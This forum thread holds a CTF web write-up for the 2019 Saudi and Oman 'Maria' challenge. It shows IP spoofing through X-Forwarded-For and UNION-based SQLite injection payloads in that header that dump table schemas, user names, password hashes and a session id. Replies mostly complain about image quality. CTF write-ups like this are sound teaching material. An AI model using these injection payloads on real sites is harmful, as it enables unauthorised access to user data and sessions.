[Saudi and Oman National Cyber Security CTF 2019] [Web] Maria WriteUp

ctf
websec
web
webhacking
writeup

(DamaneDz) #1

Hello,

I’m about to share a WebSecurity WriteUp

Let’s Open the link and see what we have …

In this Challenge there is two hints:

  1. The website store our IP address in database

  2. Maria is the only person that can reveal the flag

The Source Code:

SELECT * FROM nxf8_sessions where ip_address = ‘...

We send that to BurpSuite

Let’s Try to change our IP Address from headers via BurpSuite ….

X-Forwarded-For: 127.0.0.1

IP Changed

let’s see if there is possibilities of any SQL injection ….

let’s reduce the number of columns to avoid the error message

So we have a SQLi …. (I can’t explain more those are basics as we know Just follow the pics …)

We are dealing with SQLite here

I found two tables:

nxf8_sessions

nxf8_users

Let’s grab columns via an easy method

X-Forwarded-For: 127.0.0.1’ UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type =’table’ AND name = ‘nxf8_sessions’ LIMIT 0,1 — -

And for users

X-Forwarded-For: 127.0.0.1’ UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type =’table’ AND name = ‘nxf8_users’ LIMIT 0,1 —

From users I found that Maria ID is : 5

ID:

1,2,3,4,5,6,7,8

NAME:

Alex,Trevor,Jacob,Paul,Maria,Mira,Michael,Joshua

PASSWORD:

f7af8e099d32a7d4de771c47d7d21000eb073c77,b6d435bbaa57016efe1f67b11f88fb47a459180a,7a19fdecb23571ed265321c9f764e6a6f81f3373,20af2164daf4bfaa73d89229782b8f01686584fe,d3e1330bac4810f24a5cd3d5a0e5a74e5d4c05c2,2f7a7814f81e84ecc4d73e8fd245fa603065632a,b19213f749af5e451d5f7ee4be0147294eea1709,506f329f5e6f5b456900b9f5ef6a308890d52cfc

EMAIL:

[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]

And in our challenge there is no login pages or anything let us to get the flag and its required to use Maria as an user ….

I tried to crack the password but nothing and after a while I get back to our “nxf8_sessions” Table

X-Forwarded-For: 127.0.0.1’ UNION SELECT 1,2,3,session_id FROM nxf8_sessions WHERE user_id =5 LIMIT 0,1 — -


(Leader & Offsec Engineer) #2

(智慧雨泽) #3

emmmm This picture quality


(DamaneDz) #4

which picture you talking about !


(Leader & Offsec Engineer) #5

Maybe all of them? :smiley:


(DamaneDz) #6

You find it that bad ?


(Leader & Offsec Engineer) #7

On the burp images you can’t zoom in and read the text. Unless I’m dumb?


(DamaneDz) #8

Nah bro who said that !

What about this quality I think the problem is in your Pics uploader

0x00sec.s3.amazonaws.com


(智慧雨泽) #9

Picture is not clear.


(system) #10

This topic was automatically closed after 30 days. New replies are no longer allowed.